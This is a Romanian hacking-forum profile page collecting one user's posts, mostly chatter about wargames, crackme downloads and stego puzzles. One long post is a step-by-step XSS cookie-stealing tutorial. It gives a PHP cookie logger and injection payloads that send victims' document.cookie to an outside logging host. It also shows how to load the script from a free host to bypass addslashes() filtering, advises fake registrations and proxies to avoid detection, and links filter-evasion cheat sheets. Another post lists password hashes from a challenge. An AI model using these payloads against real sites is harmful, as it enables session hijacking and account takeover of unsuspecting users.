Jump to content

Hertz

Active Members
  • Posts

    1377
  • Joined

  • Last visited

  • Days Won

    7

Everything posted by Hertz

  1. Am descoperit de cateva zile un site de wargameuri aparut destul de recent. http://www.zeroidentity.org Mi-e mi se par foarte reusite nivelele. Putem schimba opinii,informatii,intrebari in acest thread
  2. Ti-ar place?
  3. int lasami un pm cu ID-ul
  4. Ciudat,mie nu mi se deschide patchul:-?
  5. Asta e mai special Nu e greu! http://rapidshare.com/files/138859745/app-extra.exe.html
  6. Bravo int imi place cum te descurci.
  7. Int vezi ca am mai pus un crack me.
  8. ampersand (&)
  9. http://rapidshare.com/files/138700480/5.exe.html Cam identic cu ultimul.Trebuie doar sa faceti in asa fel incat sa puteti da click.Bafta!
  10. http://rapidshare.com/files/138606886/8.exe.html E fain de tot,dar trebuie sa stiti niste trickuri.Bafta!
  11. http://rapidshare.com/files/138506234/app1.exe.html In 5 minute ar trebui sa fie rezolvata. Hint: Olly Dbg
  12. Hertz

    meow^_^

    Esti prietena lui Ken sau a lui Sys ?
  13. Nu mi merge nici cum .Nici cu googleearth.de Imi zice solved to IP 219... PASSED!~
  14. GoogleEarth Te astept la 7... sa imi zici daca treci Daca bag googleearth.com imi zice RESOLVED TO IP 64.233.161.104 Daca bag googleart.com zice la alt IP wtf?
  15. Sa nu va zic ca si mie mi-au modificat semnatura dupa ce m-au banat in "Sunt prost de cand ma stiu" sau asa ceva.RATATI,mari RATATI!
  16. Care palaria mea aveti idee la 4 IP address is 72.14.221.104. Password is a domain (domain.tld format, no subdomains) that contains the word "art" and resolves to it. You don't have to buy a domain Reverse IP Domain de pe RST nu merge.
  17. Hertz

    LA MULTI ANI SYS^_^

    LA multi ani ma punisher!
  18. Acest tutorial e facut cu scopuri educative asa ca nu imi asum nici un lucru malefic pe care il veti face invatand din acest tutorial! In acest tutorial am sa incerc sa va explic cum sa furati cookieuri folosind XSS,folosind un Cookie Stealer mai exact.Tutorialul va fii impartit in cativa pasi usori. Pasul 1:Gasirea vulnerabilitatii XSS Imi asum faptul ca fiecare dintre cei care doreste sa creeze un Cookie Stealer stie deja sa gaseasca o vulnerabilitate XSS. Pentru acest tutorial ne vom folosi doar de o simpla GET variabila XSS. Daca ai inteles asta si stii cum functioneaza metoda POST,vei fi capabil sa faceti totul fara probleme. http://www.exemplu.ro/search.php?query="><script>alert(123)</script> Cand aceasta pagina e incarcata,un alert cu "124" va aparea,ceea ce inseamna ca pagina e vulnerabila. Pasul 2:Creearea unui Cookie Stealer Pentru a fura cookieuri,ne trebuie,de exemplu,o pagina PHP care sa le pastreze pe ea pentru noi.Un simplu cookie stealer poate arata asa: <?php $cookie = $HTTP_GET_VARS["cookie"]; $file = fopen('log.txt', 'a'); fwrite($file, $cookie . "nn"); fclose($file); ?> Totodata sunt alte metode pentru a folosi cookieul.Cea mai buna dupa parerea mea este(si cea mai sigura) folosirea CCL ce poate fi gasita aici http://ccl.whiteacid.org/ . Daca folosest propriul host,poti fii detectat foarte usor .Asa ca eu am sa folosesc CCL in acest tutorial.O data inregistrat pe CCL vei primi un account format dintr-un numar random.In acest tutorial am sa folosesc un account fals , 123456. Acum testam serviciul CCL prin executarea unui string de test,mergand aici: http://ccl.whiteacid.org/log.php?123456test_for_XSS. Trebuie sa includem ID ul nostru in link,altfel nu va aparea in logurile noastre.Apoi ne logam pe CCL si vom vedea un nou log cu IP ul nostru,reffererul,user agentul si bineinteles textul 'text_for_xss'.Cookie stealerul functioneaza perfect. Pasul 3:Logarea unui cookie Deci avem o vulnerabilitate XSS si un Cookie Logger.Ceea ce trebuie sa facem e sa le conectam una la alta. Facem o noua injectare de cod(in locul acelui alert) ce trimite datele cookieului.Poate arata asa: http://www.exemplu.ro/search.php?query="><script>location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;</script> Daca siteul nu foloseste addslashes() care sa se "confrunte" cu codul nostru,vom primi cu succes cookieul in cookie loggerul de pe CCL(unde se si salveaza).De acolo putem copia cookieul furat si sa il inlocuim pe al nostru cu el,logandu-ne astfel in accountul caruia ii apartine acel cookie. Pasul 4:Filtrul Sa zicem ca am intalnit urmatoarea problema(uzuala).Siteul foloseste addslashes() in variabila GET inainte de a o afisa ceea ce ucide injectia noastra,distrungand citatiile.Nici o problema,trebuie sa gasim doar o alta metoda pentru a face asta. Ne inregistram un cont pe un host free(am sa folosesc contul hertz de pe FreeWebs.com pentru acest tutorial) si sa facem un nou script.Fac un fisier numit cookiestealer.js si imi da urmatorul continut. location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie; Acum 'accesam' scriptul printr-o pagina vulnerabila XSS. http://www.exemplu.ro/search.php?query="><script src=http://www.freewebs.com/hertz/cookiesteal.js> Logheaza-te din nou pe CCL si vei vedea noul log salvat.Nu uita sa te inregisrezi pe hostul free cu un nume fals si folosind un proxy bun ca sa nu poti fii detectat.Poti folosi si XSSed.com pentru a ti fiserele cu scripturile. Daca dai peste altre filtre decat addslashes() incearca sa rulezi scriptul prin intermediul iframeurilor,imaginilor,etc. Pentru trickuri bune in privinta trecerii peste filtre,viziteaza: http://www.xssing.com/index.php?x=1 http://ha.ckers.org/xss.html Te poti simtii liber sa ma contactezi daca ai vreo intrebare,nelamurire. Hertz
  19. Gonzalez,aia functioneaza doar daca au implementata optiunea de amprenta vocala. Deci ai grija,nu l indu in eroare!
  20. debfKNH1AvtBo deGH9Aq./kiSY denjFRfA8kzL2 deCfBQ0MS4MSA delCZeH4hHOq. deKaHJpaMFqSk deURVbdSEtxPo deImhlc0Y/L/k dehu92waVC.Pk deVX2jv60XD4Q detlQw1i3GbU2 der4QGDteh9qY Dar e tare ciudat nivelu.Care ar veni user si care password? Cum ar trebui sa le asez in fisierul .txt ? Edit:L-am trecut:D
  21. Hertz

    meow^_^

    Ce plm i cu trantitii astia care se prezinta dupa 3 luni de la inregistrare.. ce.au
  22. Pai 1 ar fi acea eroare cand postezi uneori.. DEBUG..wtf mailsend.php error. Ceva de genul. Fix it!
  23. Hai 're!
  24. Hertz

    Stegano 2

    Nope.. trebuie sa gasesti un fel de parola.
  25. Hertz

    Stegano 2

    Uitate aici .. si apoi compara semnaturile si iti dai seama atunci daca aia e diferenta http://www.rembrandt-signature-file.com/remblog.htm PS:Va trebuie un soft pentru a compara vizual pixel cu pixel
×
×
  • Create New...